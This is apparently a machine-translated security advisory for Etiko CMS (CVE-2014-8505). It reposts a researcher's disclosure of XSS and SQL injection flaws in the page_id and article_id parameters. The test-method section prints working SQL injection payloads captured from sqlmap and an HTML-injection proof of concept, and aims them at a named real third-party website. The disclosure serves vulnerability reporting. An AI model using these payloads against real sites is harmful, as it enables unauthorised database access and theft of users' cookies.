Etiko CMS index. php Cross-Site Scripting Vulnerability

Etiko CMS index. php Cross-Site Scripting Vulnerability

Release date:
Updated on:

Affected Systems:
Etiko CMS
Description:
CVE (CAN) ID: CVE-2014-8505

Etiko CMS is a content management system.

The Etiko CMS does not validate the index. A cross-site scripting vulnerability exists in php script input implementation. Remote attackers can exploit this vulnerability to execute scripts in users' Web browsers by using the page_id or article_id parameter in the constructed URL, steal cookie authentication creden.

<* Source: Felipe "Renzi" Gabriel

Link: http://xforce.iss.net/xforce/xfdb/97031
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
# SQL Injection & XSS on Etiko CMS.

# Risk: High

# CWE number: CWE-89, CWE-79

# Date: 13/10/2014

# Vendor: www.etikweb.com

# Version: All

# Author: Felipe "Renzi" Gabriel

# Contact: renzi@linuxmail.org

# Tested on: Windows 8; Chrome; Sqlmap 1.0-dev-nongit-20140906

# Vulnerables Files:/index. php &/loja/index. php

# Exploits: http://www.target.com/loja/index.php? Page_id = 19 [XSS] & [SQLi]

Http://www.target.com/index.php? Article_id = 16 [SQLi] & [XSS]

# PoC: The http://www.centrovegetariano.org/loja/index.php? Page_id = 19

Http://www.centrovegetariano.org/index.php? Article_id = 16

--- "SQLI using SQLMAP ."---

---
Place: GET
Parameter: page_id
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: page_id = 19 'AND 3987 = 3987 AND 'tulh' = 'tulh

Type: UNION query
Title: MySQL UNION query (NULL)-3 columns
Payload: page_id =-5362 'Union all select null, NULL, CONCAT (0x7175616f71, 0x467a784a6e62664d5a79, 0x716b756271 )#

Type: AND/OR time-based blind
Title: MySQL> 5.0.11 AND time-based blind
Payload: page_id = 19 'and sleep (5) AND 'mnts' = 'mnts
---

---
Place: GET
Parameter: article_id
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: article_id = 16' AND 8044 = 8044 AND 'ykze' = 'ykze

Type: UNION query
Title: MySQL UNION query (NULL)-10 columns
Payload: article_id =-2752 'Union all select 60,60, 60,60, 60,60, CONCAT (0x7167687671, 0x6d54706b774f4a6f667a, 0x7172707a71), 60,60, 60 #

Type: AND/OR time-based blind
Title: MySQL> 5.0.11 AND time-based blind
Payload: article_id = 16' and sleep (5) AND 'mdwy' = 'mdwy
---

 

--- "XSS using HTML injection ."---

Http://www.centrovegetariano.org/loja/index.php? Page_id = 19 "> <marquee> XSS </marquee>

Http://www.centrovegetariano.org/index.php? Article_id = 16 "> <marquee> XSS </marquee>

Suggestion:
Vendor patch:

Etiko
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.etikweb.com/

This article permanently updates the link address: